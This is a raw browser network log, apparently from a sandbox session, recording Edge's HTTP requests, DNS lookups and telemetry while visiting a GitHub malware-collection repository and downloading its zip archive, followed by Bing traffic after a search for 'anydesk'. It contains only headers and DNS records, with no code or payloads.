accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: image/png
content-md5: YDrNCDxuYozaAYS2sPzvIQ==
last-modified: Wed, 14 Aug 2024 19:49:39 GMT
etag: "0x8DCBC9A3C0EF02F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:06 GMT
age: 1896735
x-served-by: cache-iad-kiad7000023-IAD, cache-ams2100129-AMS
x-cache: HIT, HIT
x-cache-hits: 5234, 11079
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 78f8d89acac8ef9633688c4f5d9b94adcb135e0e
content-length: 14426
GET

https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.png

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/svg+xml
content-md5: bYAvaN8MCaSZfP0o7q/Z/w==
last-modified: Wed, 14 Aug 2024 19:18:58 GMT
etag: "0x8DCBC95F2647EDF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:06 GMT
age: 22
x-served-by: cache-iad-kiad7000081-IAD, cache-ams2100129-AMS
x-cache: HIT, HIT
x-cache-hits: 3084332, 1
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8e9f3e8cdbb88573b268517cb34b18046fd84a59
content-length: 959
GET

https://github.githubassets.com/favicons/favicon.png

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /favicons/favicon.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/png
content-md5: NG4JRxNi8pB1EKMYEhKc0g==
last-modified: Wed, 14 Aug 2024 19:18:46 GMT
etag: "0x8DCBC95EB57AC96"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:06 GMT
age: 205
x-served-by: cache-iad-kiad7000070-IAD, cache-ams2100129-AMS
x-cache: HIT, HIT
x-cache-hits: 2548140, 2
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d0dcd82870b148476385a633f5153aa415746cd6
content-length: 958
DNS

api.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

api.github.com

IN A

Response

api.github.com

IN A

20.26.156.210
DNS

api.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

api.github.com

IN A

Response

api.github.com

IN A

20.26.156.210
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.21:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1043
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:06:06 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.076214
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 2DD9:304736:240B9E:3A08BF:670163EE
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.21:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1417
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:06:06 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.076173
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 2DD9:304736:240B9E:3A08C0:670163EE
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.21:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1528
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:06:12 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.082779
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 2DD9:304736:24109D:3A1071:670163EE
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.21:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1384
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:07:15 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002304
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 2DD9:304736:24455B:3A61C8:670163F4
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 801
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:06:06 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1728147966
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: 2ECC:8A694:4C2980:525AD8:670163EE
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 324
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:06:11 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1728147971
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: 2ECC:8A694:4C2B01:525C73:670163EE
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 636
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:06:17 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1728147977
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: 2ECC:8A694:4C2D65:525F08:670163F3
DNS

21.112.82.140.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.112.82.140.in-addr.arpa

IN PTR

Response

21.112.82.140.in-addr.arpa

IN PTR

lb-140-82-112-21-iadgithubcom
DNS

21.112.82.140.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.112.82.140.in-addr.arpa

IN PTR

Response

21.112.82.140.in-addr.arpa

IN PTR

lb-140-82-112-21-iadgithubcom
DNS

210.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.156.26.20.in-addr.arpa

IN PTR

Response
DNS

210.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.156.26.20.in-addr.arpa

IN PTR

Response
DNS

codeload.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

codeload.github.com

IN A

Response

codeload.github.com

IN A

20.26.156.216
DNS

codeload.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

codeload.github.com

IN A
GET

https://codeload.github.com/Da2dalus/The-MALWARE-Repo/zip/refs/heads/master

msedge.exe

Remote address:

20.26.156.216:443

Request

GET /Da2dalus/The-MALWARE-Repo/zip/refs/heads/master HTTP/2.0
host: codeload.github.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

access-control-allow-origin: https://render.githubusercontent.com
content-disposition: attachment; filename=The-MALWARE-Repo-master.zip
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/zip
cross-origin-resource-policy: cross-origin
etag: W/"c78eabe799ca0e23e77f67470f9246428233eb97f9aed155e647cd52729d1523"
strict-transport-security: max-age=31536000
vary: Authorization,Accept-Encoding,Origin
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
date: Sat, 05 Oct 2024 16:06:15 GMT
x-github-request-id: F018:2E006B:6614A:12D2CB:670163F6
DNS

216.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.156.26.20.in-addr.arpa

IN PTR

Response
DNS

216.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.156.26.20.in-addr.arpa

IN PTR
DNS

216.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.156.26.20.in-addr.arpa

IN PTR
DNS

api.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

api.github.com

IN A

Response

api.github.com

IN A

20.26.156.210
DNS

api.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

api.github.com

IN A
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 285
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:15 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1728148035
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: B269:92CC2:610F36:6747E3:67016433
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 192
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:15 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1728148035
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: B269:92CC2:610F36:6747E2:67016433
DNS

r.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.147

e86303.dscx.akamaiedge.net

IN A

92.123.128.139

e86303.dscx.akamaiedge.net

IN A

92.123.128.149

e86303.dscx.akamaiedge.net

IN A

92.123.128.145

e86303.dscx.akamaiedge.net

IN A

92.123.128.148

e86303.dscx.akamaiedge.net

IN A

92.123.128.150

e86303.dscx.akamaiedge.net

IN A

92.123.128.144

e86303.dscx.akamaiedge.net

IN A

92.123.128.146

e86303.dscx.akamaiedge.net

IN A

92.123.128.140
DNS

r.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.150

e86303.dscx.akamaiedge.net

IN A

92.123.128.145

e86303.dscx.akamaiedge.net

IN A

92.123.128.149

e86303.dscx.akamaiedge.net

IN A

92.123.128.139

e86303.dscx.akamaiedge.net

IN A

92.123.128.140

e86303.dscx.akamaiedge.net

IN A

92.123.128.147

e86303.dscx.akamaiedge.net

IN A

92.123.128.148

e86303.dscx.akamaiedge.net

IN A

92.123.128.146

e86303.dscx.akamaiedge.net

IN A

92.123.128.144
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.132:443

Request

POST /fd/ls/lsp.aspx? HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 360
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bb777b5c.1728144461.37de918
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461085%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461085%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
